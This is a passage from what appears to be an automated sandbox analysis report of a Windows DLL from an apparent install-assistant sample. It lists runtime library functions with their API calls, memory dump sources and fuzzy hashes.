                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: ebf498d84f92459b2747110485fe1240513c0b85717e71f58504f94e6b1f447d
                              • Instruction ID: f1c4078e1b54805505fdb70802018d39fa7440f2cd0371a7fba22a0450f19706
                              • Opcode Fuzzy Hash: ebf498d84f92459b2747110485fe1240513c0b85717e71f58504f94e6b1f447d
                              • Instruction Fuzzy Hash: 97D1CB75E056489FCF05DFA8C8809EDBBB5BF49314F298169E869BB341D730EA06CB50
                              Function 6C892F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C892F95
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C892FAF
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C892FD0
                              • __Getctype.LIBCPMT ref: 6C893084
                              • std::_Facet_Register.LIBCPMT ref: 6C89309C
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8930B7
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                              • String ID:
                              • API String ID: 1102183713-0
                              • Opcode ID: 54b02fdee8184d5af0457d9287572553ffe8e1631af824746380918195db2908
                              • Instruction ID: da1ee87d390f73b891f1e61935cacdf7f0b594dd63cdece0fceb8ede06d67aba
                              • Opcode Fuzzy Hash: 54b02fdee8184d5af0457d9287572553ffe8e1631af824746380918195db2908
                              • Instruction Fuzzy Hash: 6F417BB1E006158FCB24CF98D954BAEBBB0FF58714F058528D869ABB40D734AA05CF96
                              Function 6CA04FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: c4b647ede550b6628b37064ec39c8d29397cb7ea7b616392bdff8dc175fa19ad
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: B221C170A11219BFDF208E95AD81DCF7AB9EF417ECF248226B520A1690D2718DE4C7B5
                              Function 6CA0A6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA0A6F1
                                • Part of subcall function 6CA19173: __EH_prolog.LIBCMT ref: 6CA19178
                              • __EH_prolog.LIBCMT ref: 6CA0A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: fc6d4f067277b34aeaf4b18eea65d11c6784290ecabf070322870ee952c3812a
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: 5471AE31A00254DFDB04CFA4D584BDDB7F1BF24348F1480A9D865ABB91CB74AA8ECB90
                              Function 6C9E5F7D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 6C9E604D
                              • _free.LIBCMT ref: 6C9E6076
                              • SetEndOfFile.KERNEL32(00000000,6C9E4C5C,00000000,6C9DB640,?,?,?,?,?,?,?,6C9E4C5C,6C9DB640,00000000), ref: 6C9E60A8
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9E4C5C,6C9DB640,00000000,?,?,?,?,00000000,?), ref: 6C9E60C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID: 8Q
                              • API String ID: 1547350101-4022487301
                              • Opcode ID: 7c905f9bed227d488fac9cdfd1b4e27858367dcd4d6455d9df2bfe2e0780ac39
                              • Instruction ID: 8c3bb4bccea70a7e08f06bbefb44acb5c72ffadd714656187824e0b16b368541
                              • Opcode Fuzzy Hash: 7c905f9bed227d488fac9cdfd1b4e27858367dcd4d6455d9df2bfe2e0780ac39
                              • Instruction Fuzzy Hash: 2041C4B2601619EADB139FA6CC40B8E3679EF7E329F250500E624E7A90D735D4598721
                              Function 6CA1E418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA1E41D
                                • Part of subcall function 6CA1EE40: __EH_prolog.LIBCMT ref: 6CA1EE45
                                • Part of subcall function 6CA1E8EB: __EH_prolog.LIBCMT ref: 6CA1E8F0
                                • Part of subcall function 6CA1E593: __EH_prolog.LIBCMT ref: 6CA1E598
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: c924ae5cc575613609a41bb907e5da559f684bfb7a10fd920e3d626b622539ad
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: E221BE71D05248AECB04CFE4DA849DCBBB4AF25318F204029D41663B81DF784E4CCB60
                              Function 6C9CF69A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C9CF724,?,?,6C9CF7A5,?,?,?), ref: 6C9CF6AF
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C9CF6C2
                              • FreeLibrary.KERNEL32(00000000,?,?,6C9CF724,?,?,6C9CF7A5,?,?,?), ref: 6C9CF6E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: d54614bef4e0ef49dfb256a5564119c7a9eba31a4805d594c4357d3f4f228475
                              • Instruction ID: 419e9c04444aa386edbb713a8456db74384b8969fca86a1d587d16b1a0cfead7
                              • Opcode Fuzzy Hash: d54614bef4e0ef49dfb256a5564119c7a9eba31a4805d594c4357d3f4f228475
                              • Instruction Fuzzy Hash: 56F01C3261551DFBEF019B91DA19BDE7F78EB4179AF205060A825A2960CB30CE01DB96
                              Function 6C9C7897 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog3.LIBCMT ref: 6C9C789E
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C9C78A9
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C9C7917
                                • Part of subcall function 6C9C77A0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C9C77B8
                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C9C78C4
                              • _Yarn.LIBCPMT ref: 6C9C78DA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                              • String ID:
                              • API String ID: 1088826258-0
                              • Opcode ID: 979cf863c9dcfa0382f0dcb7f1ab25f2db4c5a97fa1daae9990facd269faa02a
                              • Instruction ID: 9ab8925a960e04913d0841bc8f751c8d72502d4375aadde3259d335795872ea0
                              • Opcode Fuzzy Hash: 979cf863c9dcfa0382f0dcb7f1ab25f2db4c5a97fa1daae9990facd269faa02a
                              • Instruction Fuzzy Hash: 340196B5B002129BDB0ADB208850ABC7BB2FFB6644B158048D81257780DF34EA16CB9B
                              Function 6CA46E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: f9299512e6ef589b83757cf2e2e74ab0048e422328f4282ca0eb4b7b4faf581a
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: 40126E74D16289DFCB04CFA8C590ADDBBB1BF49308F148469E845EBB51DB31A9C9CB60
                              Function 6CA12B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: 3fc6b5e21084b8e8e8433a6ea99866e38a33188cef36865a24b0b92d9daa77aa
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: 44B13AB1D04209DFCB14CFA9C9849AEBBF1FF49318B24862EE555A7B50D730EA85CB50
                              Function 6C892020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 6C9C7897: __EH_prolog3.LIBCMT ref: 6C9C789E
                                • Part of subcall function 6C9C7897: std::_Lockit::_Lockit.LIBCPMT ref: 6C9C78A9
                                • Part of subcall function 6C9C7897: std::locale::_Setgloballocale.LIBCPMT ref: 6C9C78C4
                                • Part of subcall function 6C9C7897: _Yarn.LIBCPMT ref: 6C9C78DA
                                • Part of subcall function 6C9C7897: std::_Lockit::~_Lockit.LIBCPMT ref: 6C9C7917
                                • Part of subcall function 6C892F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C892F95
                                • Part of subcall function 6C892F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C892FAF
                                • Part of subcall function 6C892F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C892FD0
                                • Part of subcall function 6C892F60: __Getctype.LIBCPMT ref: 6C893084
                                • Part of subcall function 6C892F60: std::_Facet_Register.LIBCPMT ref: 6C89309C
                                • Part of subcall function 6C892F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8930B7
                              • std::ios_base::_Addstd.LIBCPMT ref: 6C89211B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 3332196525-1866435925
                              • Opcode ID: b8e85e27cf7a350adf714c5a802d9b76d3bdc5093ff27c2f7a1a769c6acd5cd6
                              • Instruction ID: 36670ab575ec49e699f5367657639ca360c19f7f2e9eb685c05f7c5e54df7bb5
                              • Opcode Fuzzy Hash: b8e85e27cf7a350adf714c5a802d9b76d3bdc5093ff27c2f7a1a769c6acd5cd6
                              • Instruction Fuzzy Hash: 2141E4B1E013098FDB10CF68D8457AEBBB0FF48318F108668E915AB791E775E985CB91
                              Function 6CA24EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA24ECC
                                • Part of subcall function 6CA0F58A: __EH_prolog.LIBCMT ref: 6CA0F58F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: f3a1ff7f142c0dbd2b406b1f300061c378c61d3d0fbb8d6f3a1c2a22ab494802
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: 4721E9B1911B40CFC760CF6AC14428ABBF4FF29708B00C95EC0AA97B11D7B8A649CF59
                              Function 6C9DB300 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C9DB640,6C891DEA,00008000,6C9DB640,?,?,?,6C9DB1EF,6C9DB640,?,00000000,6C891DEA), ref: 6C9DB339
                              • GetLastError.KERNEL32(?,?,?,6C9DB1EF,6C9DB640,?,00000000,6C891DEA,?,6C9E4C0E,6C9DB640,000000FF,000000FF,00000002,00008000,6C9DB640), ref: 6C9DB343
                              • __dosmaperr.LIBCMT ref: 6C9DB34A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer__dosmaperr
                              • String ID: 8Q
                              • API String ID: 2336955059-4022487301
                              • Opcode ID: 7fef0ee41f4ab8ee82ff072627c13700c3b06f50d99541cac6cc5c4938f79de4
                              • Instruction ID: 1fa1923af5e8d2bbc7a35a2df5d3d0bf29c0f461ff79c94405fd62cd0d0bf3a1
                              • Opcode Fuzzy Hash: 7fef0ee41f4ab8ee82ff072627c13700c3b06f50d99541cac6cc5c4938f79de4
                              • Instruction Fuzzy Hash: D1014C33715A14AFCF058F69DC0489D7B3DDF86328B3A4208F820A7680FB70E9019B50
                              Function 6C9D4F22 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,6C9CF4D4,6C9F6DF0,0000000C), ref: 6C9D4F27
                              • _free.LIBCMT ref: 6C9D4F84
                              • _free.LIBCMT ref: 6C9D4FBA
                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C9CF4D4,6C9F6DF0,0000000C), ref: 6C9D4FC5
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: bd6dcb8528018751a2f25786cbf9372818159b7730567f721084530856534f93
                              • Instruction ID: fceeb01639ffff92c013a20d633b037908c20b481de60fb636c6e04f0757aaff
                              • Opcode Fuzzy Hash: bd6dcb8528018751a2f25786cbf9372818159b7730567f721084530856534f93
                              • Instruction Fuzzy Hash: F6119832305E016A9B021B7D9C84DD7216D97E627DB27C624F12477ED0DF61EC294A22
                              Function 6C9E642A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,?,6C9E4C5C,00000000,00000000,?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640), ref: 6C9E6441
                              • GetLastError.KERNEL32(?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?,6C9DB640,?,6C9DC28C,6C9E6026), ref: 6C9E644D
                                • Part of subcall function 6C9E649E: CloseHandle.KERNEL32(FFFFFFFE,6C9E645D,?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?,6C9DB640), ref: 6C9E64AE
                              • ___initconout.LIBCMT ref: 6C9E645D
                                • Part of subcall function 6C9E647F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C9E641B,6C9E50AE,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?), ref: 6C9E6492
                              • WriteConsoleW.KERNEL32(00000000,?,6C9E4C5C,00000000,?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?), ref: 6C9E6472
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 9814ff3194e509c3e6e5406863f5a635770a687d128e3a4a1b86774399bb0afb
                              • Instruction ID: 49cc65ba67ad21c8fbf166098792eb6c85963ae48e21c4bfa9f809f0557daa79
                              • Opcode Fuzzy Hash: 9814ff3194e509c3e6e5406863f5a635770a687d128e3a4a1b86774399bb0afb
                              • Instruction Fuzzy Hash: A1F01C36245219BBCF231F92DC04AC93F77FF5A7A5B158010FB5986520DA32D920DF90
                              Function 6C9D3694 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog3_
                              • String ID: 8Q
                              • API String ID: 2427045233-4022487301
                              • Opcode ID: a85622ef28c8418f7a94ce99d06e09b5fcffc5728f645093341fe05b41123109
                              • Instruction ID: 2971cfd71b6f4855a54a27f59acd18559c471e7aab734d52c1efa3b7c6e37529
                              • Opcode Fuzzy Hash: a85622ef28c8418f7a94ce99d06e09b5fcffc5728f645093341fe05b41123109
                              • Instruction Fuzzy Hash: E4710674D01A069BDB108FB5C880BEEB779BF1532AF26C259E82077A40D731E885CB61
                              Function 6CA18C58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA18C5D
                                • Part of subcall function 6CA1761A: __EH_prolog.LIBCMT ref: 6CA1761F
                                • Part of subcall function 6CA17A2E: __EH_prolog.LIBCMT ref: 6CA17A33
                                • Part of subcall function 6CA18EA5: __EH_prolog.LIBCMT ref: 6CA18EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 3a3328d2ed2954b21b96a5fde5e1813dd24e127dba7746b4ec5aedb814581360
